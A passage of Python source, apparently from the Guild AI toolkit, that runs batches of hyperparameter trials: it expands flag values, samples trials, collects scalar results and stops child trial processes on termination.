out.writerow(row_vals)
def _run_trials(batch_run, trials):
trial_runs = _init_trial_runs(batch_run, trials)
run_status_lock = locklib.Lock(locklib.RUN_STATUS, timeout=RUN_STATUS_LOCK_TIMEOUT)
for trial_run in trial_runs:
if __batch_exiting.is_set():
break
_try_run_pending_trial(trial_run, batch_run, run_status_lock)
def _init_trial_runs(batch_run, trials):
return [init_trial_run(batch_run, trial) for trial in trials]
def init_trial_run(batch_run, trial_flag_vals, run_dir=None):
run = op_util.init_run(run_dir)
_link_to_trial(batch_run, run)
proto_run = batch_run.batch_proto
assert proto_run, "proto_run not initialized for batch %s (%s)" % (
batch_run.id,
batch_run.dir,
)
util.copytree(proto_run.dir, run.dir)
run.write_attr("flags", trial_flag_vals)
run.write_attr("label", _trial_label(proto_run, trial_flag_vals))
run.write_attr("op", _trial_op_attr(proto_run, trial_flag_vals))
op_util.set_run_pending(run)
op_util.set_run_started(run)
return run
def _link_to_trial(batch_run, trial_run):
trial_link = os.path.join(batch_run.dir, trial_run.id)
rel_trial_path = os.path.relpath(trial_run.dir, os.path.dirname(trial_link))
util.ensure_deleted(trial_link)
os.symlink(rel_trial_path, trial_link)
def _trial_label(proto_run, trial_flag_vals):
label_template = (proto_run.get("op") or {}).get("label_template")
return op_util.run_label(label_template, trial_flag_vals)
def _try_run_pending_trial(trial_run, batch_run, status_lock):
stage = batch_run.get("stage_trials")
with status_lock:
trial_status = trial_run.status
if trial_status != "pending":
log.info(
"Skipping %s because its status is %s",
trial_run.id,
trial_status,
)
return
try:
start_trial_run(trial_run, stage)
except SystemExit as e:
handle_trial_system_exit(e, batch_run, trial_run)
def start_trial_run(run, stage=False):
from guild.commands import run_impl
_log_start_trial(run, stage)
with __trial_running_lock:
run_impl.run(restart=run.id, stage=stage, quiet=stage)
def _trial_op_attr(proto_run, trial_flag_vals):
proto_op_data = proto_run.get("op")
if not proto_op_data:
return None
deps = op_util.op_deps_for_data(proto_op_data.get("deps"))
for dep in deps:
dep.config = trial_flag_vals.get(dep.resdef.name) or dep.config
proto_op_data["deps"] = op_util.op_deps_as_data(deps)
return proto_op_data
def _log_start_trial(run, stage):
desc = "Running" if not stage else "Staging"
log.info(
"%s trial %s: %s (%s)",
desc,
_trial_name(run),
run_util.format_operation(run),
_trial_flags_desc(run),
)
def _trial_name(run):
if util.compare_paths(os.path.dirname(run.dir), var.runs_dir()):
return os.path.basename(run.dir)
else:
return "in %s" % run.dir
def _trial_flags_desc(run):
flags = {
name: val for name, val in (run.get("flags") or {}).items() if val is not None
}
return op_util.flags_desc(flags)
def invalid_flag_function_args_error(e):
raise SystemExit(
"invalid function args in '%s=%s': %s"
% (e.flag_name, _flag_value_for_function(e.function_name, e.function_args), e)
)
def _flag_value_for_function(name, args):
args_list = ":".join([str(arg) for arg in args])
return "%s[%s]" % (name, args_list)
def handle_trial_system_exit(e, batch_run, trial_run):
msg, code = main.system_exit_params(e)
if code == 0:
if msg:
log.info(msg)
elif code == exit_code.SIGTERM:
log.info("Trial %s was terminated", _trial_name(trial_run))
elif code == exit_code.KEYBOARD_INTERRUPT:
log.info("Stopping batch")
raise SystemExit(code)
else:
log.error(
"Trial %s exited with an error%s",
_trial_name(trial_run),
_trial_run_error_desc(code, msg),
)
if fail_on_trial_error(batch_run):
log.error(
"Stopping batch because a trial failed (pending trials "
"can be started as needed)"
)
raise SystemExit(code)
def _trial_run_error_desc(code, msg):
if msg:
return ": (%i) %s" % (code, msg)
else:
return " (%i) - see log for details" % code
def fail_on_trial_error(batch_run):
params = batch_run.get("run_params") or {}
return params.get("fail_on_trial_error")
def run_trial(batch_run, flag_vals):
run = init_trial_run(batch_run, flag_vals)
start_trial_run(run)
return run
###################################################################
# Utils
###################################################################
def is_batch(run):
return os.path.exists(run.guild_path("proto"))
def batch_run():
current_run = gapi.current_run()
if not current_run:
raise CurrentRunNotBatchError("no current run")
proto_path = current_run.guild_path("proto")
if not os.path.exists(proto_path):
raise CurrentRunNotBatchError("missing proto %s" % proto_path)
return current_run
def expand_flags(flag_vals, random_seed=None):
expanded = _expand_flags_base(flag_vals)
_apply_flag_functions(expanded, random_seed)
return expanded
def _expand_flags_base(flag_vals):
"""Expands flag vals without applying flag functions."""
flags_list = [_expand_flag(name, val) for name, val in sorted(flag_vals.items())]
return [dict(flags) for flags in itertools.product(*flags_list)]
def _expand_flag(name, val):
if not isinstance(val, list):
val = [val]
return [(name, _flag_function_or_val(x, name)) for x in val]
def _flag_function_or_val(val, flag_name):
if not isinstance(val, six.string_types):
return val
try:
name, args = flag_util.decode_flag_function(val)
except ValueError:
return val
else:
return _FlagFunction(name, args, flag_name, val)
class _FlagFunction:
def __init__(self, name, args, flag_name, flag_value):
from guild.plugins import skopt_util
self.dim, self.initial = skopt_util.function_dim(name, args, "dummy")
self.flag_name = flag_name
self.flag_value = flag_value
self._applied_initial = False
def apply(self, random_state):
from guild.plugins import skopt_util
if self.initial is not None and not self._applied_initial:
self._applied_initial = True
return self.initial
try:
res = skopt_util.skopt.dummy_minimize(
lambda *args: 0, [self.dim], n_calls=1, random_state=random_state
)
except Exception as e:
if log.getEffectiveLevel() <= logging.DEBUG:
log.exception(
"apply flag function %s for %s with dim %s",
self.flag_value,
self.flag_name,
self.dim,
)
log.warning(
"error applying function %s for flag %s: %s",
self.flag_value,
self.flag_name,
e,
)
return None, random_state
else:
val = skopt_util.native_python_xs(res.x_iters[0])[0]
return val, res.random_state
def _apply_flag_functions(trials, random_seed):
random_state = random_seed
for flag_vals in trials:
for name, val in flag_vals.items():
if isinstance(val, _FlagFunction):
val, random_state = val.apply(random_state)
flag_vals[name] = val
def expanded_batch_trials(batch_run, random_seed=None):
proto_run = batch_run.batch_proto
flag_vals = proto_run.get("flags") or {}
trials = proto_run.get("trials")
if trials:
user_flag_vals = proto_run.get("user_flags") or {}
return expand_trial_flags(trials, flag_vals, user_flag_vals, random_seed)
else:
return expand_flags(flag_vals, random_seed)
def expand_trial_flags(trials, flag_vals, user_flag_vals, random_seed=None):
expanded = []
for trial_flag_vals in trials:
merged_flags = _merged_trial_flags(trial_flag_vals, flag_vals, user_flag_vals)
expanded.extend(_expand_flags_base(merged_flags))
_apply_flag_functions(expanded, random_seed)
return expanded
def _merged_trial_flags(trial_flag_vals, flag_vals, user_flag_vals):
merged = dict(flag_vals)
merged.update(trial_flag_vals)
merged.update(user_flag_vals)
return merged
def sample_trials(trials, count=None, random_seed=None):
count = count or DEFAULT_MAX_TRIALS
if len(trials) <= count:
return trials
random.seed(random_seed)
# Sample indices and re-sort to preserve original trial order.
sampled_i = random.sample(range(len(trials)), count)
return [trials[i] for i in sorted(sampled_i)]
def trial_results(batch_run, scalars, prev_trials_mode=PREV_TRIALS_BATCH):
return trial_results_for_runs(trial_runs(batch_run, prev_trials_mode), scalars)
def trial_results_for_runs(runs, scalars):
index = _run_index_for_scalars(runs)
return [(run.get("flags"), _result_scalars(run, scalars, index)) for run in runs]
def trial_runs(batch_run, prev_trials_mode=PREV_TRIALS_BATCH):
if prev_trials_mode == PREV_TRIALS_BATCH:
return _batch_trial_runs(batch_run)
elif prev_trials_mode == PREV_TRIALS_SOURCECODE:
return _proto_sourcecode_runs(batch_run)
elif prev_trials_mode == PREV_TRIALS_OPERATION:
return _proto_op_runs(batch_run)
else:
raise ValueError(
"unsupported value for prev_trials_mode: %r" % prev_trials_mode
)
def _batch_trial_runs(batch_run):
"""Returns trial runs associated with a batch run."""
runs = var.runs(
batch_run.dir,
filter=_completed_filter,
sort=["timestamp"],
force_root=True,
)
_apply_batch_runs_realpath(runs)
return runs
def _completed_filter(run):
return run.status == "completed"
def _apply_batch_runs_realpath(runs):
"""Update run dirs to real location from relative location under batch."""
for run in runs:
run.path = util.realpath(run.path)
def _proto_sourcecode_runs(batch_run):
"""Returns runs whose sourcecode digest matches that of a batch proto."""
return var.runs(
filter=_completed_sourcecode_filter(batch_run.batch_proto),
sort=["timestamp"],
)
def _completed_sourcecode_filter(proto_run):
assert proto_run
proto_sourcecode_digest = _proto_sourcecode_digest(proto_run)
def f(run):
run_sourecode_digest = run.get("sourcecode_digest")
return (
run.status == "completed"
and run_sourecode_digest == proto_sourcecode_digest
)
return f
def _proto_sourcecode_digest(proto_run):
sourcecode_digest = proto_run.get("sourcecode_digest")
if not sourcecode_digest:
log.error(
"Cannot find runs for batch proto in %s: missing sourcecode digest",
proto_run.dir,
)
raise SystemExit(1)
return sourcecode_digest
def _proto_op_runs(batch_run):
"""Returns runs whose op matches that of a batch proto."""
return var.runs(
filter=_completed_op_filter(batch_run.batch_proto),
sort=["timestamp"],
)
def _completed_op_filter(proto_run):
assert proto_run
proto_opspec = run_util.format_operation(proto_run, nowarn=True)
def f(run):
run_opspec = run_util.format_operation(run, nowarn=True)
return run.status == "completed" and run_opspec == proto_opspec
return f
def _run_index_for_scalars(runs):
from guild import index as indexlib # expensive
index = indexlib.RunIndex()
index.refresh(runs, ["scalar"])
return index
def _result_scalars(run, scalars, index):
return [_run_scalar(run, scalar, index) for scalar in scalars]
def _run_scalar(run, scalar, index):
prefix, tag, qualifier = scalar
return index.run_scalar(run, prefix, tag, qualifier, False)
def handle_system_exit(e):
main.handle_system_exit(e)
def init_logging():
op_util.init_logging()
def objective_scalar(batch_run, default=None):
obj = batch_run.get("objective") or default or DEFAULT_OBJECTIVE
if obj[0] == "-":
return obj[1:], -1
return obj, 1
def stop_trials_on_sigterm(batch_run):
def handler(_signum, _stack_frame):
# Reset handler for SIGTERM to avoid reentry.
signal.signal(signal.SIGTERM, signal.SIG_DFL)
_start_batch_terminate_thread(batch_run)
signal.signal(signal.SIGTERM, handler)
def _start_batch_terminate_thread(batch_run):
thread = threading.Thread(target=lambda: _terminate_batch(batch_run))
thread.start()
def _terminate_batch(batch_run):
import psutil
__batch_exiting.set()
this_p = psutil.Process()
assert this_p.pid == batch_run.pid, (this_p.pid, batch_run.pid)
children = this_p.children(recursive=True)
for child in children:
log.info("Stopping trial (proc %i)", child.pid)
child.terminate()
_gone, alive = psutil.wait_procs(children, timeout=30)
for child in alive:
log.info("Forcefully terminating trial (proc %i)", child.pid)
child.kill()
log.info("Stopping batch (pending trials can be started as needed)")
with __trial_running_lock:
this_p.terminate()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.